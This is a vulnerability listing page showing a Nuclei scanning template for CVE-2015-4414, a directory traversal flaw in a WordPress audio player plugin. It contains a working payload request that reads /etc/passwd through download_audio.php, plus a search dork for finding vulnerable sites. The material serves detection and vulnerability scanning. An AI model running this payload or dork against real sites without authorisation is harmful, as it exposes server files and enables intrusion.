Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-4414
HistorySep 27, 2021 - 11:02 a.m.

WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal

2021-09-2711:02:48
ProjectDiscovery
github.com
4
cve2015
wordpress
wp-plugin
lfi
edb
packetstorm
se_html5_album_audio_player_project

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.4

Confidence

High

EPSS

0.125

Percentile

95.5%

WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a … (dot dot) in the file parameter.

id: CVE-2015-4414

info:
  name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
  author: daffainfo
  severity: medium
  description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
  remediation: |
    Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/37274
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4414
    - https://www.exploit-db.com/exploits/37274/
    - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html
    - https://wpvulndb.com/vulnerabilities/8032
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-4414
    cwe-id: CWE-22
    epss-score: 0.12486
    epss-percentile: 0.95299
    cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: se_html5_album_audio_player_project
    product: se_html5_album_audio_player
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
  tags: cve2015,cve,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a1e96510bf46f0ef10d550a44e8008d7c94bdc586bca89d6326af5877a9aa00e0221009f73f1b77fe426015fe533efc27ee70158689c68e345cbcf26c1e772fdd9d695:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.4

Confidence

High

EPSS

0.125

Percentile

95.5%